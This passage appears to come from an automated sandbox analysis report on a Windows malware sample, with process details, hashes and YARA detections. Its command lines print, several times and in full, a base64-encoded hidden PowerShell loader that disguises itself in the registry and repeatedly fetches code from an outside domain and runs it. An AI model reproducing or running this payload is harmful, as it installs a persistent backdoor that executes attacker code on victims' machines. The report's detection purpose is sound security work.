EAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlACAAJAByAGsAZQB5AE4AOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAZwBlAHQAdABlAHIARgB1AG4AYwAoACQAcgApADsACgAKAAkACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAKAAkACQAJAAkAJABlAHgAIAA9ACAAJAB0AHIAdQBlADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAJAAkAfQAgAGUAbABzAGUAIAB7AAoACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAJAAkAfQAKAAoACQAJAHQAcgB5ACAAewAKAAkACQAJACQAZAB0ACAAPQAgAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQALwB4AD8AdQA9ACQAdQAmAGkAcwA9ACQAaQBzACYAbAB2AD0AJABsAHYAJgByAHYAPQAkAHYAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwAKAAoACQAJAAkAJABqAGQAMgAgAD0AIABnAGUAdAB0AGUAcgBGAHUAbgBjACgAJABkAHQAKQA7AAoACQAJAAkAaQBmACAAKAAkAGoAZAAyAFsAMABdACAALQBnAHQAIAAkAHYAKQAgAHsACgAJAAkACQAJACQAdgAyACAAPQAgACQAagBkADIAWwAwAF0AOwAKAAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQAgAC0ATgBhAG0AZQAgACQAcgBrAGUAeQBOACAALQBWAGEAbAB1AGUAIAAkAGQAdAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAJABqAGQAMgA7AAoACAJAAkACQAkAGUAeAAgAD0AIAAkAHQAcgB1AGUAOwAKAAkACQAJAH0ACgAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkAaQBmACAAKAAkAGUAeAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAdAByAHkAewAKAAkACQAJAAkAcwB0AG8AcAA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAGkAZQB4ACAAJABqAGQAWwAxAF0AOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAkACQB9AAoACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAoACQB0AHIAeQAgAHsACgAJAAkAJABzAGwAcwAgAD0AIAAoACgAZwBlAHQALQByAGEAbgBkAG8AbQAgADcAMAAgAC0AbQBpAG4AaQBtAHUAbQAgADUAMAApACoANgAwACkAOwAKAAkACQAkAHQAcwAgAD0AIABbAGkAbgB0AF0AKABHAGUAdAAtAEQAYQB0AGUAIAAtAFUARgBvAHIAbQBhAHQAIAAlAHMAKQA7AAoACgAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQByAHUAbgAoACQAZAAsACQAdQAsACQAaQBzACkAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANgA1ACAALQBtAGkAbgBpAG0AdQBtACAAMgA1ACkAOwAKAAkACQAJACQAdABzADIAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQBiAHIAZQBhAGsAIABzAGwAOwAKAAkACQAJAH0ACgAJAAkAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA==""
Imagebase:0x4a400000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:2
Start time:17:42:09
Start date:23/06/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlACAAJAByAGsAZQB5AE4AOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAZwBlAHQAdABlAHIARgB1AG4AYwAoACQAcgApADsACgAKAAkACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAKAAkACQAJAAkAJABlAHgAIAA9ACAAJAB0AHIAdQBlADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAJAAkAfQAgAGUAbABzAGUAIAB7AAoACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAJAAkAfQAKAAoACQAJAHQAcgB5ACAAewAKAAkACQAJACQAZAB0ACAAPQAgAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQALwB4AD8AdQA9ACQAdQAmAGkAcwA9ACQAaQBzACYAbAB2AD0AJABsAHYAJgByAHYAPQAkAHYAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwAKAAoACQAJAAkAJABqAGQAMgAgAD0AIABnAGUAdAB0AGUAcgBGAHUAbgBjACgAJABkAHQAKQA7AAoACQAJAAkAaQBmACAAKAAkAGoAZAAyAFsAMABdACAALQBnAHQAIAAkAHYAKQAgAHsACgAJAAkACQAJACQAdgAyACAAPQAgACQAagBkADIAWwAwAF0AOwAKAAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQAgAC0ATgBhAG0AZQAgACQAcgBrAGUAeQBOACAALQBWAGEAbAB1AGUAIAAkAGQAdAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAJABqAGQAMgA7AAoACAJAAkACQAkAGUAeAAgAD0AIAAkAHQAcgB1AGUAOwAKAAkACQAJAH0ACgAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkAaQBmACAAKAAkAGUAeAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAdAByAHkAewAKAAkACQAJAAkAcwB0AG8AcAA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAGkAZQB4ACAAJABqAGQAWwAxAF0AOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAkACQB9AAoACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAoACQB0AHIAeQAgAHsACgAJAAkAJABzAGwAcwAgAD0AIAAoACgAZwBlAHQALQByAGEAbgBkAG8AbQAgADcAMAAgAC0AbQBpAG4AaQBtAHUAbQAgADUAMAApACoANgAwACkAOwAKAAkACQAkAHQAcwAgAD0AIABbAGkAbgB0AF0AKABHAGUAdAAtAEQAYQB0AGUAIAAtAFUARgBvAHIAbQBhAHQAIAAlAHMAKQA7AAoACgAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQByAHUAbgAoACQAZAAsACQAdQAsACQAaQBzACkAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANgA1ACAALQBtAGkAbgBpAG0AdQBtACAAMgA1ACkAOwAKAAkACQAJACQAdABzADIAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQBiAHIAZQBhAGsAIABzAGwAOwAKAAkACQAJAH0ACgAJAAkAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA=="
Imagebase:0x4a400000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Target ID:3
Start time:17:42:09
Start date:23/06/2022
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlACAAJAByAGsAZQB5AE4AOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAZwBlAHQAdABlAHIARgB1AG4AYwAoACQAcgApADsACgAKAAkACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAKAAkACQAJAAkAJABlAHgAIAA9ACAAJAB0AHIAdQBlADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAJAAkAfQAgAGUAbABzAGUAIAB7AAoACQAJAAkAJAB2ACAAPQAgACQAagBkAFsAMABdADsACgAJAAkAfQAKAAoACQAJAHQAcgB5ACAAewAKAAkACQAJACQAZAB0ACAAPQAgAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQALwB4AD8AdQA9ACQAdQAmAGkAcwA9ACQAaQBzACYAbAB2AD0AJABsAHYAJgByAHYAPQAkAHYAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwAKAAoACQAJAAkAJABqAGQAMgAgAD0AIABnAGUAdAB0AGUAcgBGAHUAbgBjACgAJABkAHQAKQA7AAoACQAJAAkAaQBmACAAKAAkAGoAZAAyAFsAMABdACAALQBnAHQAIAAkAHYAKQAgAHsACgAJAAkACQAJACQAdgAyACAAPQAgACQAagBkADIAWwAwAF0AOwAKAAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQAgAC0ATgBhAG0AZQAgACQAcgBrAGUAeQBOACAALQBWAGEAbAB1AGUAIAAkAGQAdAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAKAAkACQAJAAkAJABqAGQAIAA9ACAAJABqAGQAMgA7AAoACAJAAkACQAkAGUAeAAgAD0AIAAkAHQAcgB1AGUAOwAKAAkACQAJAH0ACgAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkAaQBmACAAKAAkAGUAeAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAdAByAHkAewAKAAkACQAJAAkAcwB0AG8AcAA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAGkAZQB4ACAAJABqAGQAWwAxAF0AOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAkACQB9AAoACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAoACQB0AHIAeQAgAHsACgAJAAkAJABzAGwAcwAgAD0AIAAoACgAZwBlAHQALQByAGEAbgBkAG8AbQAgADcAMAAgAC0AbQBpAG4AaQBtAHUAbQAgADUAMAApACoANgAwACkAOwAKAAkACQAkAHQAcwAgAD0AIABbAGkAbgB0AF0AKABHAGUAdAAtAEQAYQB0AGUAIAAtAFUARgBvAHIAbQBhAHQAIAAlAHMAKQA7AAoACgAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQByAHUAbgAoACQAZAAsACQAdQAsACQAaQBzACkAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANgA1ACAALQBtAGkAbgBpAG0AdQBtACAAMgA1ACkAOwAKAAkACQAJACQAdABzADIAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQBiAHIAZQBhAGsAIABzAGwAOwAKAAkACQAJAH0ACgAJAAkAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA=="
Imagebase:0x21d70000
File size:452608 bytes
MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888389730.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888152756.0000000000390000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888245760.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888181676.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888226541.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888319048.0000000000629000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
  • Rule: SUSP_PS1_JAB_Pattern_Jun22_1, Description: Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, Source: 00000003.00000002.888441908.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
Reputation:high

Disassembly

Reset < >

    Execution Graph

    Execution Coverage:10.1%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:14.3%
    Total number of Nodes:91
    Total number of Limit Nodes:7
